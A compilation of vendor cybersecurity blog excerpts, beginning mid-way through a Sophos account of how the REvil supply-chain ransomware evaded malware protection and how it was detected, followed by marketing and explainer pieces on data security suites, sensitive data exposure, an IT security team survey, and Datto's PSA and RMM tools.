The tactics to evade malware protection used here—poisoning a supply-chain well, taking advantage of vendor carve-outs from malware protection, and side-loading with an otherwise benign (and Microsoft-signed) process—are all very sophisticated. They also show the potential risks of excluding anti-malware protection from folders where automated tasks write and execute new files. While zero-day supply-chain exploits are rare, we’ve already seen two major systems management platforms exploited in the past year. While Sunburst was apparently a state-funded attack, ransomware operators clearly have the resources to continue to acquire additional exploits.

Even so, the anti-malware evasion used by this REvil attack was not unstoppable, and was detected by a number of antimalware products. The REvil payload itself was detectable by Sophos as Mal/Generic-S by Intercept X, and Troj/Ransom-GIP and Troj/Ransom-GIS, as well as HPmal/Sodino-A in on-premises protection products. The REvil-specific code certificate is also detected as Mal/BadCert-Gen. While the protection exclusions may have allowed the REvil dropper to be installed on machines, the ransomware itself was detected. Intercept X’s cryptoransomware protection feature is not constrained by folder exclusions, and would block file encryption anywhere on protected drives.

Source: Sophos

Addressing an organization’s data security challenges requires some heavy lifting – no question about it. Whether data security worries center around internal security lapses or stem from the harsh reality of being targeted by those with malicious intent, organizations face a constant need to be on the alert and protective of sensitive data.
Rather than cobble together a piecemeal solution strategy, relying on a trusted solutions provider that offers a suite of integrated, scalable data security solutions can provide relief. Knowing what data needs to be protected, classifying the data, applying controls to the data without slowing down business processes, and sharing all this sensitive data securely can provide IT and security leaders peace of mind.

The Challenge of Gaining Data Visibility

With the massive amount of data exchanged daily, knowing what data exists, where it lives, who can access it, and how it is ultimately sent is critical to organizational data security. The visibility factor is naturally a concern for CISOs, as a recent HelpSystems data security study attests and is square one when it comes to data security and the policies and solutions needed for a proactive security stance.
Diving into true data visibility includes defining policies and procedures, ensuring they are working and being used, and then assessing which technologies can be put in place to help automatically and efficiently bolster the security needed around sensitive data.

The Challenge of Identifying What Data Needs Protection

To keep the flow of business running for mission-critical communications and not throw unnecessary productivity barriers up, it’s important to first address the fact that not all the vast amount of data exchanged is equal and in need of extensive protection.
Organizations implementing a data classification solution that applies markers to only halt the data which meets the level of protection criteria you set can help ensure business keeps running, (minus potential data breaches). Metadata labels allow other security solutions within the environment to understand which data is sensitive and requires further protection along its journey based on the organizational policy set.
With data classification in place, you can identify and sort out what data is sensitive and in need of protection and which is more mundane and shareable without the more nuanced layers of security to streamline secure data exchanges.

The Challenge of Data Protection Efficiency

Many traditional data security solutions end up blocking “safe” data alongside the potentially malicious or harmful data they are meant to stop. These false positives or false negative alerts can quickly spiral out of control, unnecessarily slowing down the flow of business.
These traditional solutions focus on tight control, but at a cost. At some point, the data handcuffs can get too restrictive and the need to share and access easily (and securely) becomes a top priority for productivity. However, protecting data throughout its lifecycle is not a one size fits all process.
Putting an Adaptive Data Loss Protection (A-DLP) solution in place can take organizations beyond the “block everything” mode by going on the defense to detect and prevent unauthorized sharing before any breach occurs. With DLP in place, organizations gain flexibility and can intelligently inspect and sanitize both structured and unstructured (meta) data within emails, files being transferred via web or cloud, and endpoints to ensure the specified security policy is applied automatically.
This flexibility is of particular importance to highly regulated industries and to adhere to data privacy laws such as HIPAA, PCI-DSS, CCPA, GDPR, and more, which specify the level of protection that should surround data at all points in its journey.

The Challenge of Sharing Files Securely and Efficiently

Once data has been classified and sanitized, the challenge of sending it to a third-party or internally must be met. A secure managed file transfer (MFT) solution can rise to the challenge while meeting stringent compliance requirements for end-to-end protection. Automated workflows, as well as auditing and reporting functionality, add increased security and transparency around file transfers large and small. This reduces the human factor risks so often responsible for file transfer errors.
Combining MFT with Adaptive DLP can further ensure that any files sent and received do not contain sensitive data.

The Challenge Remote Work Poses

As organizations reimagine how and where work gets accomplished, a growing number of workers will continue working from wherever is most convenient and at times on their personal devices. While this flexibility is mostly welcomed, it does not come without data security threats. Employees, of course, are among an organization’s most valuable assets, but they also pose some of the biggest risks without education, intelligent technology solutions, and policies and procedures that are easy to follow to ensure data security.

Data is unquestionably more vulnerable with this more flexible work environment and the human factor continues to pose threats. When people are busy, tired, or pressured is when mistakes around securing data tend to be made.

The need to communicate and collaborate securely remains and the risk of exposing sensitive data both within and outside of the organizations grows higher with more user access points and the ad hoc use of non-approved collaboration and file transfer processes.

Organizations need mechanisms that let people work yet have a safety net to protect them (and their employers) from doing the wrong thing data security-wise. With more demand for functionality comes more risk in sharing data with third parties or via the cloud, upping the risk of a data breach or compliance requirement failures.

The Challenge of Managing Multiple Security Solutions

While it’s easy to see that layers of security can help freeze insecure data movement in it tracks, reduce human error risks, and ensure that even hidden sensitive data isn’t inadvertently accessed, managing those layers with multiple vendors can create productivity bottlenecks.
One way to take alleviate pressure on IT staff is to work with a single trusted vendor capable of delivering multiple layers of security for operational simplicity. This can help ensure that your data classification, data loss prevention, and managed file transfer tools are well integrated and scalable. If the elements that make up your data security suite are not easy and intuitive to use, it will lose its effectiveness as the last barrier to employees making a data security error.

Facing Data Security Challenges with a Security Suite

A solid security suite is one flexible enough that it enforces your security policies, rather than force processes into the solution itself. One benefit of employing a suite-style solution is that it can be implemented in modular fashion. You can deploy a single software solution to address today’s specific data security issue and be comfortable knowing you can add additional layers of security as your needs grow and change. In addition, you can take advantage of solution integrations and enjoy economies of scale.

Data security can encompass any one or a combination of these technologies:

Data Classification: Attaches markings to data to trigger encryption policies. There is no need for a separate encryption job when this is employed.

Data Loss Prevention: Enforces compliance policies with data redaction and sanitization of data as it looks for classification tags and removes risks while letting “safe” data pass through. Over-policing of data typically seen with DLP enforcement can be avoided.

Integrated Email Security: Detect, defend against, and deter phishing, business email compromise, and other advanced identity deception email attacks.

Managed File Transfer: Provides a secure platform to more easily share data with trusted individuals and includes automation, auditing, and reporting functionality.

Digital Rights Management: Add a security wrapper around data wherever it travels, and control and revoke access as needed after it leaves your organization.

How Can We Help You Meet Your Data Security Challenges?

Every organization has different data security challenges, requiring a customized approach to how security layers are applied. Let us show you how you can face your data security challenges more easily with help from the suite of data security solutions from HelpSystems.

I’d Like a Security Suite Demo

Source: Boldon James

The term sensitive data exposure means letting unauthorized parties access stored or transmitted sensitive information such as credit card numbers or passwords. Most major security breaches worldwide result in some kind of sensitive data exposure.

Exploiting an attack vector such as a web vulnerability is just the first step that the attacker takes. Further steps usually involve one of three goals: stealing sensitive information, planting malicious software (for example, to attack other targets or enable permanent control/spying), or escalating to other systems (where this choice repeats). Obviously, stealing sensitive information such as credit card data is the most profitable goal for the attacker and most cyberattacks are driven by money, hence sensitive data exposure is the most common attack goal.

Just like it is possible to create software with next to no vulnerabilities, it is also possible to create software that prevents the attacker from accessing sensitive information. Sensitive data exposure is caused by bad design or implementation of computer systems and software as well as misconfiguration of such systems and software.

Defining sensitive data

When you build a web application, you must clearly define what you consider to be sensitive data. While some examples are obvious, like credit card numbers, authentication credentials, or health records, others may not seem so straightforward. Even if a piece of information is to be displayed onscreen by the application, it may still be considered sensitive in transit and storage.

Any type of data that can be considered personal data or private data should be considered sensitive. This means even data such as first and last name, date of birth, or even an email address. Criminals are after such data because they can correlate personal information stolen from other sources to create profiles for identity theft.

Any data related to financials should also be considered sensitive and this does not mean just credit card numbers. For example, bank account numbers, both internal and IBAN, should also be considered sensitive as well as any transaction amounts.

Depending on the industry that your business deals in, some data may be not only considered sensitive but also covered by compliance regulations. Make sure that all that data is secured, both in transit and in storage, otherwise you will lose your compliance.

Sensitive data exposure vulnerabilities in transit

Most websites and web applications nowadays are accessible via secure SSL/TLS connections. Many go as far as enforcing such connections using HTTP strict transport security (HSTS). As a result of this, many web application designers think that it’s safe to transmit sensitive information between the client and the server using clear text.

This mindset is the primary cause of sensitive data exposure in transit. Unfortunately, despite the fact that SSL/TLS provides a high degree of protection, there are cases when a man-in-the-middle attack (MITM) on network traffic is possible. If the attacker somehow manages to access data transmitted between the web application and the user, and this data includes, for example, credit card numbers or clear text passwords, the attack ends up in sensitive data exposure.

Therefore, the best way to protect your web application against sensitive data exposure is never to transmit any sensitive data using clear text and always use cryptographic algorithms to secure them. Note that these should not be weak crypto algorithms because the attacker may store the intercepted data and later attempt to break the encryption using powerful GPUs.

Sensitive data exposure vulnerabilities in storage

Storing sensitive data securely is just as important as transmitting it securely, if not more. If an attacker exploits a vulnerability and gains access to your website or web application, for example, using an SQL injection, they may be able to access the content of your entire database. If any sensitive information is stored in the database without encryption, it’s a guaranteed leak.

When storing sensitive information, using renowned, secure, and strong encryption algorithms is even more important than in the case of transit. A weak algorithm will let the attacker quickly run brute force attacks on the stolen encrypted data and decode the original information.

In addition to strong database encryption, some types of sensitive data need extra protection. For example, passwords that are encrypted or hashed using even the strongest algorithms can be easily broken if the password itself is a weak password. Therefore, avoiding common password vulnerabilities is just as important as encryption or hashing.

Sensitive data exposure vulnerabilities in email

It is shocking to see how many businesses and institutions forget that email is not a secure channel and sensitive data should never be transmitted using this medium. Email connections between the client and the server may be encrypted but the connections between servers are usually done using plain text. The email body is not encrypted, either. And the recipient of the email has no control over how securely their email content is stored or whether it is actually destroyed when the email is deleted client-side.

If your web application sends emails, you should never send any sensitive data in emails and, instead, use the web application itself to present or accept sensitive information. For example, you should never ever send a new password via an email and instead display it for the user on a web page. An institution should also never send any personal and sensitive data in clear text over emails, which is, unfortunately, the way that many government institutions do it in many countries.

Protecting sensitive data

Sensitive data is considered important enough by OWASP (the Open Web Application Security Project) to feature it in the OWASP Top 10 as a separate category. In the 2017 edition, this category was considered the third most important common flaw. We also believe that in the upcoming 2021 OWASP Top 10 this category will only gain in importance. Therefore, you should take great care to protect your sensitive information and avoid sensitive data exposure.

Protecting your sensitive data is really easy as long as you use cryptographic algorithms in transit and in storage along with any side-measures such as, for example, proper key management (so that your keys are as safe as the data itself). In some cases, you don’t even need to transmit or store encrypted data, you can use hash algorithms. Password hashing is the most efficient way to make sure that passwords are never stolen, both in transit and in storage.

Source: Acunetix

Read our new report The IT Security Team: 2021 and Beyond to ascertain the full impact of the pandemic on the IT security teams around the globe.

Based on findings of an individual survey of 5,400 professionals across 30 countries, the report reveals how IT security teams’ cybersecurity experiences changed over the course of 2020 and what this means for the future delivery of IT security.

More work, more learning

With technology a key enabler for dispersed and digital organizations, IT professionals played a vital role in helping organizations to keep going despite the restrictions and limitations necessitated by COVID-19.

At the same time, adversaries were quick to take advantage of the opportunities presented by the pandemic: 61% of IT teams overall reported an increase in the number of cyberattacks targeting their organization over the course of 2020.

It’s therefore not surprising that demand on IT teams grew over the course of 2020. 63% of respondents said their team saw an increase in non-security workload, while 69% experienced an increase in IT security workload.

However, the vast majority of IT teams that faced a rise in cyberattacks (82%) and a heavier security workload (84%) over the course of 2020 also strengthened their security skills and knowledge.

Adversity brought teams together

Despite the challenges created by the pandemic, 52% of the IT teams surveyed said team morale increased during 2020, with those facing the greatest challenges often reporting the greatest increase. For instance, ransomware victims were considerably more likely to have experienced an increase in team morale than those that weren’t hit (60% versus 47%.)

While morale is also likely influenced by external and personal circumstances during the pandemic, these findings suggest that a shared purpose, a sense of value and facing adversity together helped to bond and lift the spirits of IT teams.

The experiences of 2020 have fuelled ambitions for bigger IT teams

Many teams have entered 2021 with plans to increase the size of both in-house and outsourced IT teams, and to embrace the potential of advanced tools and technologies.

The survey found that 68% of IT teams anticipate an increase in in-house IT security staff by 2023, and 56% expect the number of outsourced IT security staff to grow up over the same time frame.

An overwhelming majority (92%) expect Al to help deal with the growing number and/or complexity of threats.

Read the full survey findings

To learn more, including a deep dive into the experiences of different countries and sectors over 2020 and their future IT security delivery plans, read The IT Security Team: 2021 and Beyond survey report.

Source: Sophos

There are many different technologies that drive business for managed service providers (MSPs), but few are more important than professional services automation (PSA) and remote monitoring and management (RMM) tools used to run their core business of delivering IT managed services.

MSPs have a lot on their plate, from managing client relationships, growing sales pipeline, keeping endpoints up to date and secure, and resolving tickets quickly. To grow their business, it’s critical to effectively utilize business management tools like PSA and RMM to drive efficiency, insight, client satisfaction–and ultimately, profitability. So for MSPs, selecting the right vendor for these tools is an important decision.

Canalys MSP Tech Stack Report

Canalys, a third-party analyst firm focused on the MSP channel, recently debuted their annual MSP Tech Stack Report assessing the performance and momentum of global PSA and RMM vendors. Of the 17 vendors analyzed in the report, Datto was given the highest combined Momentum and Performance score, along with placement in the ‘Strategic’ category, indicating a dedication to the development of our solutions and technological capability.

In order to be recognized as a strategic vendor for RMM and PSA, vendors needed to demonstrate strong technological capabilities and illustrate investment and ambition for continued growth. Vendors in this category also needed to display solid work in product development and technological capability, acquisitions to broaden their portfolio, and deliver training to provide MSPs with the skills necessary to help customers with their IT assets.

Driving efficiency and insight through integrated, MSP-centric solutions

Datto has a unique combination of demonstrated performance based on key metrics and strong future opportunities as defined by our technological capabilities, strategy, and open ecosystem. This enables Autotask PSA and Datto RMM to help MSPs deliver efficient, high-quality managed services for the IT environments of today, and prepare for those of tomorrow.

Datto Autotask PSA and RMM are secure, reliable, and intuitive cloud-based platforms designed to help MSPs run their IT managed services business more efficiently. The seamless integration between the two platforms can help elevate MSPs to higher levels of insight, productivity, and profitability with easy navigation between platforms and relevant real-time asset data and actions providing clear insight into your managed estate. This integration enables MSPs to mitigate issues before they occur, shave minutes off each ticket, and unlock new business opportunities.

“We are excited about being ranked as the highest combined scoring vendor in the RMM and PSA space by Canalys,” said Radhesh Menon, Chief Product Officer at Datto. “Being recognized as a ‘strategic’ vendor validates our focus on innovating to help our partners grow their business with secure and easy-to-use platforms that help drive efficiency, actionable insights, and profitability.”

To learn more about the PSA and RMM vendor landscape, download the report today.

Source: Datto